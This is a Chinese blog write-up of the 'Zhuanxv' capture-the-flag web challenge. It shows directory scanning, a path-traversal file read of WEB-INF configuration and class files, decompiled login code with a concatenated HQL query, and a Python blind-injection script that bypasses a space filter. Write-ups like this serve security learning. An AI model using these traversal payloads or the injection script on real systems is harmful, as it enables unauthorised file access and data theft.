攻防世界web进阶区Zhuanxv详解

最新推荐文章于 2024-04-04 22:42:44 发布
最新推荐文章于 2024-04-04 22:42:44 发布
阅读量1.5k 收藏 7
点赞数 3
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hxhxhxhxx/article/details/107971454
版权

攻防世界web进阶区Zhuanxv详解

题目

提示:

在这里插入图片描述

详解

在这里插入图片描述
扫描目录发现了一个list
我们使用了好几个扫描工具,只有wwwscan,和webdirscan可以,(可能是我字典太菜了)

发现需要登录
在这里插入图片描述
在这里插入图片描述
查看源代码发现,这里有问题,加载图片的方式很诡异
试试文件读取
在这里插入图片描述
在这里插入图片描述
他的cookie里有jessionid 说明他是使用JAVA写的网页
那么我们尝试找找web.xml

../../WEB-INF/web.xml
在这里插入图片描述

有一个struts2
这个是struts的工作原理,以及一些讲解
apps-存放了所有Struts2的示例项目

docs-存放了所有Struts2与XWork的文档

lib-存放了所有Struts2相关的JAR文件以及Struts2运行时所依赖的JAR文件

src-存放了所有Struts2的源码,以Maven所指定的项目结构目录存放

https://blog.csdn.net/u010004082/article/details/79351459
在这里插入图片描述

读取struts.xml
loadimage?fileName=../../WEB-INF/classes/struts.xml
在这里插入图片描述

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE struts PUBLIC
        "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
        "http://struts.apache.org/dtds/struts-2.3.dtd">
<struts>
	<constant name="strutsenableDynamicMethodInvocation" value="false"/>
    <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
    <constant name="struts.action.extension" value=","/>
    <package name="front" namespace="/" extends="struts-default">
        <global-exception-mappings>
            <exception-mapping exception="java.lang.Exception" result="error"/>
        </global-exception-mappings>
        <action name="zhuanxvlogin" class="com.cuitctf.action.UserLoginAction" method="execute">
            <result name="error">/ctfpage/login.jsp</result>
            <result name="success">/ctfpage/welcome.jsp</result>
        </action>
        <action name="loadimage" class="com.cuitctf.action.DownloadAction">
            <result name="success" type="stream">
                <param name="contentType">image/jpeg</param>
                <param name="contentDisposition">attachment;filename="bg.jpg"</param>
                <param name="inputName">downloadFile</param>
            </result>
            <result name="suffix_error">/ctfpage/welcome.jsp</result>
        </action>
    </package>
    <package name="back" namespace="/" extends="struts-default">
        <interceptors>
            <interceptor name="oa" class="com.cuitctf.util.UserOAuth"/>
            <interceptor-stack name="userAuth">
                <interceptor-ref name="defaultStack" />
                <interceptor-ref name="oa" />
            </interceptor-stack>

        </interceptors>
        <action name="list" class="com.cuitctf.action.AdminAction" method="execute">
            <interceptor-ref name="userAuth">
                <param name="excludeMethods">
                    execute
                </param>
            </interceptor-ref>
            <result name="login_error">/ctfpage/login.jsp</result>
            <result name="list_error">/ctfpage/welcome.jsp</result>
            <result name="success">/ctfpage/welcome.jsp</result>
        </action>
    </package>
</struts>

这里class里面可以看到很多class类名,尝试了一下,都可以逐个下载,点号换成正斜杠,然后再在后面加个.class就可以下载了,下载后用jd反编译class文件

发现一个看起来和登陆有关的类UserLoginAction,构造payload下载:
?fileName=../../WEB-INF/classes/com/cuitctf/action/UserLoginAction.class
在这里插入图片描述
我们使用jd-gui java反编译工具
我们将文件下载,并修改为.class文件
我们使用luyten反编译
在这里插入图片描述

package com.cuitctf.action;

import com.cuitctf.service.*;
import com.cuitctf.po.*;
import com.cuitctf.util.*;
import org.springframework.context.*;
import com.opensymphony.xwork2.*;
import java.util.regex.*;
import java.util.*;

public class UserLoginAction extends ActionSupport
{
    private UserService userService;
    private User user;
    
    public UserLoginAction() {
        final ApplicationContext context = InitApplicationContext.getApplicationContext();
        this.userService = (UserService)context.getBean("userService");
    }
    
    public String execute() throws Exception {
        System.out.println("start:" + this.user.getName());
        final ActionContext actionContext = ActionContext.getContext();
        final Map<String, Object> request = (Map<String, Object>)actionContext.get("request");
        try {
            if (!this.userCheck(this.user)) {
                request.put("error", "\u767b\u5f55\u5931\u8d25\uff0c\u8bf7\u68c0\u67e5\u7528\u6237\u540d\u548c\u5bc6\u7801");
                System.out.println("\u767b\u9646\u5931\u8d25");
                return "error";
            }
        }
        catch (Exception e) {
            e.printStackTrace();
            throw e;
        }
        System.out.println("login SUCCESS");
        ActionContext.getContext().getSession().put("user", this.user);
        return "success";
    }
    
    public boolean isValid(final String username) {
        final String valiidateString = "[a-zA-Z0-9]{1-16}";
        return matcher(valiidateString, username);
    }
    
    private static boolean matcher(final String reg, final String string) {
        boolean tem = false;
        final Pattern pattern = Pattern.compile(reg);
        final Matcher matcher = pattern.matcher(string);
        tem = matcher.matches();
        return tem;
    }
    
    public boolean userCheck(final User user) {
        final List<User> userList = (List<User>)this.userService.loginCheck(user.getName(), user.getPassword());
        if (userList != null && userList.size() == 1) {
            return true;
        }
        this.addActionError("Username or password is Wrong, please check!");
        return false;
    }
    
    public UserService getUserService() {
        return this.userService;
    }
    
    public void setUserService(final UserService userService) {
        this.userService = userService;
    }
    
    public User getUser() {
        return this.user;
    }
    
    public void setUser(final User user) {
        this.user = user;
    }
}

截取部分有用的代码

  public boolean userCheck(User user) {
 List<User> userList = this.userService.loginCheck(user.getName(), user.getPassword());
 if (userList != null && userList.size() == 1) {
   return true;
 }
 addActionError("Username or password is Wrong, please check!");
 return false;
}

在这里插入图片描述
发现还有一个userservicempl的类
我们下载

    public List <User> loginCheck(String name, String password) {
        name = name.replaceAll(" ", "");
        name = name.replaceAll("=", "");
        Matcher username_matcher = Pattern.compile("^[0-9a-zA-Z]+$").matcher(name);
        Matcher password_matcher = Pattern.compile("^[0-9a-zA-Z]+$").matcher(password);
        if (password_matcher.find()) {
            return this.userDao.loginCheck(name, password);
        }
        return null;
    }

找到登录的规则

是登陆语句的过滤规则,在UserDaoImpl.class中找到:

 public List < User > loginCheck(String name, String password) {
        return getHibernateTemplate().find("from User where name ='" + name + "' and password = '" + password + "'");  
    }

这里是大佬的盲注脚本

import requests
s=requests.session()

flag=''
for i in range(1,50):
    p=''
    for j in range(1,255):
  		payload="(select%0Aascii(substr(id,"+str(i)+",1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'"+str(j)+"'"
  		url="http://111.198.29.45:35732/zhuanxvlogin?user.name=admin'%0Aor%0A"+payload+"%0Aor%0Aname%0Alike%0A'admin&user.password=1"
  		r1=s.get(url)
  		if len(r1.text)>20000 and p!='':
  			flag+=p
  			print i,flag
  			break
  		p=chr(j)

在这里插入图片描述

無名之涟
关注
专栏目录
sctf2018-zhuanxv:SCTF2018-Zhuanxv Docker(源码)&Writeup
05-11
sctf2018-zhuanxv 部署 启动 ./start_up.sh 停止 docker-compose down WP 第一步:信息收集 信息收集,发现github上遗留的说明。 根据提供的url进入登录地址,发现用户名密码已经无法登陆 第二步:下载源码 查看网页源代码,发现背景图片的加载方式使用./loadimage?fileName=web_login_bg.jpg ,找到任意文件下载点,下载一系列文件。这里限制了下载文件的后缀只有class xml jpg css等。 第三步:代码审计 根据github的commit记录 了解实现类的位置。 从user.hbm.xml得知表名和类名映射 从com/cuitctf/service/impl/UserServiceImpl.class得知过滤规则,用户名只过滤空格和等号,密码限制只能字母+数字 从com/cuitctf/dao/i
mysql万能密钥_攻防世界-web-Zhuanxv(任意文件读取、万能密钥、sql盲注 )
weixin_28785509的博客
01-21 505
题目来源:XCTF 4th-SCTF-2018题目描述:你只是在扫描目标端口的时候发现了一个开放的web服务进入场景后是一个显示时间的页面使用dirsearch扫描一下,发现隐藏目录list。命令:python3 dirsearch.py -u http://220.249.52.133:43210/ -e *访问list目录,发现是一个后台登录页面抓包发现背景图片是从后台加载的一张图片或者从网页...
【xctf之Zhuanxv
qq_40646572的博客
10-13 735
打开链接地址,发现就一个这,没任何提示。那就web目录先来一波扫描。发现了一个页面,先看下。是个后台登陆界面,大胆猜测存在弱口令?爆破失败。没办法了,先看看网页源码还有网络请求吧。看到这个请求是请求背景图片加载,看着和正常的图片加载感觉不太一样,是不是存在任意文件读取呢?尝试文件读取fuzz,失败。(有一说一,到这我就没思路了。。。。。我是真的菜。)看了官方writeup,发现github搜索了下Zhuanxv,可是我找到git项目的时候啥也没有就一个没用的默认用户和密码。
xctf攻防世界 Web高手进阶 Zhuanxv
l8947943的博客
01-07 1471
1.进入环境,查看内容 没有什么其他信息,尝试dirsearch一下,如图: 发现有/list页面,我们尝试一下,发现让登录,如图: 猜测是需要想办法登入,从而拿到flag 2.问题分析 对内容进行抓包 先forward,然后再通过action送入repeater,如图: 发现图片是请求加载的,也就是通过后端传说过来的,那么可以响应的url,如图: 通过/loadimage?fileName=web_login_bg.jpg拿到了图片。既然知道了服务器的地址和请求路径,我们就通过路径访问得到项目的
CTF 之Zhuanxv
最新发布
qq_74263993的博客
04-04 943
UserServiceImpl.class反编译后代码中是对空格进行了过滤,而sql中对回车自动过滤, 因此我们可以将空格字符换成%0A(ascii码表示换行符)。User.class反编译后是一个Bean文件,UserLoginAction.class反编译后是登录验证逻辑文件,InitApplicationContext.class反编译后是类加载器文件。其中暴露了使用的数据库,数据库账号密码,且其中包含了user.hbm.xml等配置文件,同样我们将其下载出来。很可惜进来了还是没有一点线索。
【愚公系列】2023年06月 攻防世界-WebZhuanxv
时光隧道
06-18 3997
dirsearch是一个用于寻找Web服务器上隐藏目录和文件的Python脚本。它可以帮助您发现会被忽视的文件和文件夹,从而提高Web应用程序的安全性。暴力枚举目录和文件搜索常用的Web目录和文件查找隐藏的Web页面和应用程序检查Web服务器配置错误使用dirsearch需要在命令行中输入一些参数和选项。暴力枚举目录: dirsearch.py -u -e搜索常用的Web目录和文件: dirsearch.py -u -w。
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界序列化问题详解.md
09-12
攻防世界,序列化问题
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
[SCTF 2018]ZhuanXV
Sk1y的博客
12-19 876
赛题:[SCTF 2018]ZhuanXV 文章目录赛题:[SCTF 2018]ZhuanXV读取文件sql注入漏洞 读取文件 使用dirsearch工具进行扫描 发现/list,访问是个登录界面,查看源码 发现背景图片的路径 查看web.xml http://111.200.241.244:63455/loadimage?fileName=../../WEB-INF/web.xml 发现使用了strut2框架, struts.xml是struts2的核心配置文件,在开发过程中利用率最高。该文件主
攻防世界 WEB ZHUANXV
qq_41696858的博客
09-07 422
打开场景,根据提示提示,扫描目录,扫出来一个/list,提示要先登录,先抓个包看看,在第二个包出抓到了形如/loadimage?fileName=web_login_bg.jpg 再熟悉不过了,文件包含,结合cookie里的phpsession和jsessionid可以判断出,后端同时使用了java和php 那么,既然是java项目,就尝试读取一下web.xml,这个是javaweb项目最基础的一个xml文件,一般再WEB-INF目录下 构造/loadimage?fileName=…/…/WEB-INF/w
攻防世界 web高手进阶 7分题 Zhuanxv
闵行小鱼塘
08-12 721
继续ctf的旅程,开始攻防世界web高手进阶的7分题,本文是Zhuanxv的writeup
攻防世界web进阶zhuanxv
gongjingege的博客
08-10 596
SCTF 题目描述:你只是在扫描目标端口的时候发现了一个开放的web服务 打开链接是一个显示时间的页面 dirsearch扫一下 打开list页面 抓包看一下 看到JSESSIONID,得知是java web,读取配置文件web.xml 考虑了一下会不会是sql注入 看看源码,里边有个导入路径 打开url 会下载一张图片,但不能查看,notepad++看下源码 这里struts2有另一个大佬的解释 https://www.cnblogs.com/mke2fs/p/11519039.html 然后
[wp] SCTF 2018 Zhuanxv
MercyLin的博客
09-18 1898
扫目录发现/list,点进去发现要登陆,抓包发现一个请求为 试一下有没有文件读取漏洞
web做题记录(buuoj,jarvis,攻防世界,bugku,hackme)
CJB6988125的博客
11-19 1万+
web做题笔记 buuoj easy_tornado tornado是一个python写的web服务器 读取文件hint.txt:md5(cookie_secret+md5(filename)) 我们只要找到cookie_secret 就能读取任意文件 直接搜cve:找到一个\r\n分割请求的。。好像搞不到cookie_secret 找到error?msg=Error模板注入??? {{1.}}出...
攻防世界-web萌新-FlatScience(python处理pdf、sqlite注入)-Hack.lu-2017
Sea_Sand息禅
04-15 5838
日常扫描: 进站后点击链接尝试会让下载pdf文件。(后面要用到pdf文件) 访问robots.txt: 再依次对这两个页面进行测试: admin.php无论如何输入都没有什么反馈 login.php在username中输入admin' union select database()时报错: 可以看到是sqlite数据库,表的结构和查询函数和MySQL有所不同。 在这里花了相当长的时间...
[wp] 攻防世界 ics-04
热门推荐
MercyLin的博客
09-24 3万+
尝试注册登陆账号 扫了下目录没发现什么,用sqlmap把每个页面跑过去,发现在找回密码页面有注入 sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" --...
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码来获取敏感信息或者执行未经授权的操作。 为了详细了解攻防世界-baby_web的攻击和防御方法,我们可以进行以下步骤: 1. 分析源代码:通过查看源代码,我们可以了解应用程序的结构和逻辑,以及可能存在的漏洞点。 2. 注入攻击:尝试使用注入攻击来获取数据库信息或者执行其他恶意操作。可以使用工具如sqlmap来自动化进行注入测试。 3. 防御措施:了解并实施防御措施,如输入验证、参数化查询、安全编码等,以防止注入攻击和其他常见的安全漏洞。 请注意,进行任何形式的攻击都是非法的,除非您是经过授权的安全专家或者在合法的渗透测试环境中进行。在现实世界中,攻击和防御是一个持续的过程,需要不断学习和更新知识。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值